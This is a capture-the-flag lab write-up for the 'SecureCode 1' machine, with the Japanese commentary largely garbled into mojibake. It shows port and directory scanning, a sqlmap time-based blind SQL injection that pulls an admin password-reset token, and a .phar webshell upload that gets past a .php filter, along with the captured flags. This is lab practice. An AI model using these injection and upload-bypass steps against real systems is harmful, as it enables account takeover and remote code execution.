SecureCode 1
Recon
nmap
โโโ(kaliใฟkali)-[~/Documents/securecode]
โโ$ nmap -p- --min-rate 10000 192.168.179.129
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-20 07:19 -0500
Nmap scan report for 192.168.179.129
Host is up (0.00011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:99:FC:D3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
Web

Directory / File
โโโ(kaliใฟkali)-[~/Documents/securecode]
โโ$ feroxbuster -u http://192.168.179.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ๏ค ver: 2.13.1
โโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโ
๏ฏ Target Url โ http://192.168.179.129/
๏ฉ In-Scope Url โ 192.168.179.129
๏ Threads โ 50
๏ Wordlist โ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
๏ Status Codes โ All Status Codes!
๏ฅ Timeout (secs) โ 7
๏ฆก User-Agent โ feroxbuster/2.13.1
๏ Config File โ /home/kali/.config/feroxbuster/ferox-config.toml
๏ Extract Links โ true
๏ฒ Extensions โ [zip]
๏ HTTP methods โ [GET]
๏ Recursion Depth โ 4
โโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโ
๏ Press [ENTER] to use the Scan Management Menuโข
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<SNIP>
200 GET 5780l 35615w 5275298c http://192.168.179.129/source_code.zip
ๅ่ฆใงzipใๆขใ้ ญใซใชใใชใใฃใใฎใงใๆฎ้ใซใใฎ่พบใง่ฉฐใพใฃใฆใใ
Code
zipใซใฏใขใใชใฑใผใทใงใณใณใผใใๅ ฅใฃใฆใใใ

- ใจในใฑใผใใฏใใชใใขใผใในใใผใใกใณใใงใฏใชใใ๏ผไปๆงใฏใใใใใใชใใ๏ผใจในใฑใผใ้ขๆฐใซ้ ผใฃใฆใใ
- idใใฉใกใผใฟใฏ
'ใงๅฒใพใใฆใใชใใฎใงใSQLใคใณใธใงใฏใทใงใณใซ่ๅผฑใช็ถๆ ใซใชใฃใฆใใ
ๅฝ่ฉฒๆฉ่ฝใsqlmapใงใดใชๆผใใใใผใใซๆง้ ใฏใฝใผในใณใผใใใๅใใฃใฆใใใ

ใในใฏใผใใชใปใใใฎ้ใใใฎuserใใผใใซใซใใผใฏใณใๆธใ่พผใพใใใ

Exploit
ใฎใงใuserใใผใใซใฎadminใซ็บ่กใใใฆใใใในใฏใผใใชใปใใใใผใฏใณใๅพใใใจใงใไปปๆใฎใในใฏใผใใซๅคๆดใงใใใ
โโโ(kaliใฟkali)-[~/Documents/securecode]
โโ$ sqlmap -r viewItem.php --fresh-queries --dbms=MySQL --code=404 --technique=T --time-sec=1 -D hackshop --sql-query='SELECT token FROM user WHERE id=1'
<SNIP>
[08:53:33] [INFO] fetching SQL SELECT statement query output: 'SELECT token FROM user WHERE id=1'
[08:53:33] [INFO] retrieved: 1
[08:53:34] [INFO] retrieved: whwl1vNGVOJca0z
SELECT token FROM user WHERE id=1: 'whwl1vNGVOJca0z'
[08:54:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.179.129'
ใใฎใใผใฏใณใใdoResetPassword.phpใซๆธกใใจใใในใฏใผใใชใปใใใใผใธใซ่กใใใฎใง

ใชใปใใใใฆ

ใญใฐใคใณใใใ

Congrats, FLAG1: 0410e2bd77f66dc9a567ab00aa29599cd
ใใกใคใซใขใใใญใผใใใใใ.phpใฏ้ใใชใใฎใงใ.pharใไฝฟใฃใฆwebshellใ่จญ็ฝฎใใใ


ใใใชใซใๅฏพ่ฑกใใกใคใซใ่ฆใคใใใ

legendary
FLAG2: 3599f5effdb3ed07d9a90a4ed19d13ad4
ZIP่ฆใคใใใจใใใ่ฅๅนฒใจในใใผๅณใใ...๏ผใใใชใใใ...